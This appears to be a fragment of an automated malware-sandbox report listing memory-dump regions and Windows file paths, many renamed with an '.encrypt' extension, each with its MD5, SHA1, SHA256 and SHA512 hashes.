SHA256 5745a04cb8b6421629678a53fda2972125c6d7cb4cfdf808c971758aee5c195a
SHA512 f40e8120185010a11d5c0fac079f2000b1eb5bc4e565c508486cafa4796fd149fde18481ac59d997e9ab5578a5d92a4635ad2e426b5a1d208ba08a5edac71d57

memory/4200-20666-0x0000000002E20000-0x0000000002E21000-memory.dmp

memory/15308-20712-0x0000000000CD0000-0x0000000000CDC000-memory.dmp

memory/15308-20713-0x0000000005630000-0x000000000563A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 13998fcca120b6c5af5c251fdebd3e00
SHA1 aa0a8d9bb4dba4e285b3178f0fa253636f9fe88d
SHA256 b6fd013b3647341ccb162aec70e73c7c815a88b957a153374f2a73af28d74474
SHA512 a511d826c8208a364d1e4bff9a558cb70954add92fd104edcb9f8d2e67d8f98aac2b4a5f6a397cd4237c7fa7bde83d837cfad02c40eba45597c632355bfc1db6

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\UpdateLock-308046B0AF4A39CB.encrypt

MD5 da5a094000b37a4e04a465c6d6bbc293
SHA1 b4b879462fc2d90910afe5af37a933324c5f86a9
SHA256 4d66bafcea9fe79a33b3d91b6a4236618789539c9d7630b4b118a8e96e198701
SHA512 9446492ca0f55a9571794c2792f6dc18dee4857b282d1c0aac7569dbd56455b8d424cc801e2eb9245cfc93b228fad2dfcabc762a532e98f2a695d649b293f7eb

C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.encrypt

MD5 2c77adefdfbe014fb62ad974049e828f
SHA1 e48c2312c4295c844288ea6c402f9386cc51d11a
SHA256 989e46ef8aff059a4e973b4383e0e41d154247b2b1e25f2633f9633bdebe2d7a
SHA512 4df2888e33f80049324985b9f04fafd3e3be07cdc57ae77bd1ca33dfb5be3c7c68d2ec3a73139520439360fa59b069a4f2ca4e01e84e07feb2a4615be44434d6

C:\ProgramData\Package Cache\{9F51D16B-42E8-4A4A-8228-75045541A2AE}v56.64.8781\dotnet-host-7.0.16-win-x64.msi.encrypt

MD5 56deaccc2392ca238d60ecc3b0d27664
SHA1 6a1626d090dd8ca269b709da6610b9a5b8efbaba
SHA256 9771b44185ded8d4314162961987cf7ad35430e33f1e5e4d4ead580556835b96
SHA512 a31403259c5969ba05518c1a01c9cc3e0c8356f060912f5e39939789cb7809fd3cc87feea17300f3491244f6ebd151f6c4b0f4d6f8fe45ee3b736b3f2fc4f2d8

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.encrypt

MD5 407d7e7876d5be15bfeaf54f51e8c9cd
SHA1 b0c6a52e8df06e27db7c90c7c1fda5f155c1d337
SHA256 03ce645063d5ad0975947b0cbe1ba75ac1801ab8ff59c94ffa3375f82d19d50a
SHA512 3c37cdd7567aed4f5ba4a1f9b53ef3433c5e0a42e9eb981812d4af8cb56f6d57f6c8a5431dcab9d1dc7b1c73b78f6175855cd000dbe5cab864bf9c19749321db

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT.encrypt

MD5 f3237bbe4306bedad354bbf5e034422f
SHA1 e741ddd0f9bebc1f0f92156a29588b9ff5bcb22b
SHA256 197092afe4b83735abe4527dabcdb1611a8e6b3aab6c315192fa7d77aa588471
SHA512 df68c6780e88874c3ad0f99d4b3b907bec2ffb245079ac56161e3a6448cc4ca772d4a22506544eb6cd53560d9f612089895f2a70e4bfc96ea36e831f7c7b71c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001.encrypt

MD5 f1ac3ec81b83a43c30d0fd9e35244660
SHA1 c306d03a18837fe7fe77b2a8a8f6b0097f678b6d
SHA256 ab6aba16cdfe80c6bfd3ddca1c1f5bd3ebcae37b281d9334f7a2e972d88347c7
SHA512 9be08613a568f133022bf7d1f48fb0db3a2581f82bd6288d210fc2f14088bf2ba105695aa775a2a25650bff5dbeee30122578d5549f555fdba6bd095922af93d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index.encrypt

MD5 e9cd4ab7c97ea4c5ebc296eb9055e144
SHA1 3ad5a9b9358208b3df0d0a5a3d46cb516d19bdf7
SHA256 77c2858bc280859278e5f4b9d9900ecdc401875e7e1e09d444dc603aef758eff
SHA512 328e77fdb94cbd5a783cc751a05973f01ec87aba08fadc06deba7728f0e5ca3b5d214d6c8304f79a3899126c1a676e4d478691ce9fd408db8206769f2ce72947

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_0.encrypt

MD5 2c4fbecf0640659ddc7777d9257ebec2
SHA1 0c19240e9425f9c5063a764d0cba9b98af746426
SHA256 1218414192aa4deead487810dc61ae28faf482b675c75fd59a27dfdca46bd40c
SHA512 4e20ee85f88f49538ced3c368e93c1e26867c4f22891a1af2b9f6080911e69b8d0bebc77918b16f4c35d4ba310a2ae548bc0c738c44c7ee3659b4706ebe0c4ff

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_1.encrypt

MD5 10ed2063cf25b63857d7f135e7ee9711
SHA1 9b86e518fdd6cf3b6d7903fbce9471a19da9bc84
SHA256 f72c4b75fbc3f81c4a3b0051e34ffacd011e40c3180b2d5c937adc62669bdd2f
SHA512 8bc93d2de3cca4532a0360e99bc6877aae6126baedb88aa7cf43b14bb5065fcd276d419d5d779cf839e2819d0d1419d867faffbbc707d971ba6f6763993d88a2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_2.encrypt

MD5 c6be081dec773f94cc72e044da310ad8
SHA1 ed83425cc57ed4a4d5b4bafbe7f7f71dd4485348
SHA256 a728b5540892ca6abf4cf0fadf7c1f367881b49cdbbc537263dd5d99e2c66a1c
SHA512 f609f42c4a030533f0e8fe7896413a02ef8ae0575f63c39d2cbee9807a84e4b105116bb9debb6bc2b695cacb1186ad3002243abbd8b10d261c7ed7b2a60e7117

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_3.encrypt

MD5 0f07325043818b3c8dc717cce36ead70
SHA1 b8897c8b7467894eda1b693560890aa62ed9fbaf
SHA256 bb2e1fa07ece8650c688f5a1fd5208c94687329b8515776a6403d74e9695598a
SHA512 706b6d30695fab17c3d6adf314a1e3606b842bbfb67f7a8c1656ed4140086fe8c40c303aa82a014e2ffab1852d515508bacee0c2c5f4952a809d50ef16f00d6a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a1be40d935c28df4f69953e00c50ae6b
SHA1 d75f548b5b74dd26157f30f048b0f0fc5d8b0ad2
SHA256 06958a77ca74aa69d5c6d551912f41734cc47a27012ed51e587b4f5e885ea022
SHA512 f4abed47d60c633669421bcc1075ed8ffc6a97c416c99e95fc16da696d07dd8f13ffdefb4b2b7516599bdfeff7525b0d3773f371d9698d7e54378cd7582c8a49

memory/19832-22584-0x0000000000400000-0x000000000044E000-memory.dmp

memory/4200-22585-0x0000000000D80000-0x0000000000D81000-memory.dmp

memory/4200-22587-0x0000000000D90000-0x0000000000D91000-memory.dmp

memory/4200-22588-0x0000000002A50000-0x0000000002A51000-memory.dmp

memory/4200-22589-0x0000000002D60000-0x0000000002D61000-memory.dmp

memory/4200-22590-0x0000000002E60000-0x0000000002E61000-memory.dmp

memory/4200-22592-0x0000000002E30000-0x0000000002E31000-memory.dmp

memory/4200-22595-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

memory/4200-22598-0x00000000094E0000-0x00000000094E1000-memory.dmp

memory/4200-22599-0x000000000AFE0000-0x000000000AFE1000-memory.dmp

memory/4200-22600-0x000000000AFF0000-0x000000000AFF1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 dce42dc3cf39635e92fb9d1a7d6043bd
SHA1 623827ff2e96ada51c90fffa42726398ecb2d302
SHA256 71f2f591ba4ab3a0aa88f38ad62f6b30b34f4188bd3ce9d6c36d44ea59fa45db
SHA512 ca6a29a22152625d9dbd698fec12f4d46d169486919c611029d2677a6d9e2b1adb3b18878764e2ae43db9be5e89cc51f84e2a032449fa978f0506cca4b0d57c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RFe64da44.TMP

MD5 c2424c8465029cda8030f46f4915ab55
SHA1 77d60ce860c347e855219a5dc1ad053e9bfee30c
SHA256 e348e92a90285a30b932fc76314cebaa7f0c550795fd6377a5b74bdfab31f728
SHA512 77dd5b5f0a1d98eeb46fc7a928733403673429854afbb271c43d4c052cc75746ecb958e5602b0ebacb4d6c0a1255e34ce20fcab85d87172969a0fe786c98242e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 788b5f014c018d32adc107e78f2594d3
SHA1 eb60b4464fdf98c3a36a6244271ed4538f3ce37f
SHA256 a04883353eb93c21920f85278ec908db76888b99625d5b02dcad3fc3a3dc0b87
SHA512 cd8ecb26036e6c24c896195069d4a26658cdc21fd3f2229f74996180b0354b8e88d0c7b3d2eb693e96b8ac30881008354a76809bbe9ce5397e76530da015107c

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe

MD5 94b56d65a8b7f7253aeacac345d4b096
SHA1 7e11e248ae804d3647479a4fe5f03835a1eee4bc
SHA256 0f312587a999305794730da6f2198c82a346e64211e2fb054256102ac70315be
SHA512 538cc0c1b4dc66e8a3c6ca9a17ddac128441874248589bcc6c88b64ad7d3b93ff143867d6fad0002cbb4584e951d0e82441c350396e6d59b73207a3ffe0fc055

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133895710623192049.txt

MD5 e8c695bdb16bb8483342955cc99be60c
SHA1 1558643614dc903d2fd12197dc96b133e1075a4e
SHA256 0b666da3983130ddd5d37bca3345b90a5754318f0f722277c36860d7a15ec80a
SHA512 d3e34a77dc44f99a2af27763233eb90fddae49e378fda07db5a0293797a570bcb834b0cf568e7011c3bc9d49e6219b3a0563f3803e0c6923454d204c0fd1c732

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 9717dc76a8f27142ef21f89bc469c5f7
SHA1 4f76a8af1c06c4902cd50b6744f832c716ececa0
SHA256 a2fedb9a561751b101bd80fca318ea56990dc1d66be77302a2ed9ddb37867174
SHA512 d8e390d27316d7708e7921cae9e0c32acfd4f04cb46fa23555de5d694ea9de9ebf2b70ef89c822891f4ab00883dd76babc1c5d24b3a2eaa190548f8d4abb4e1e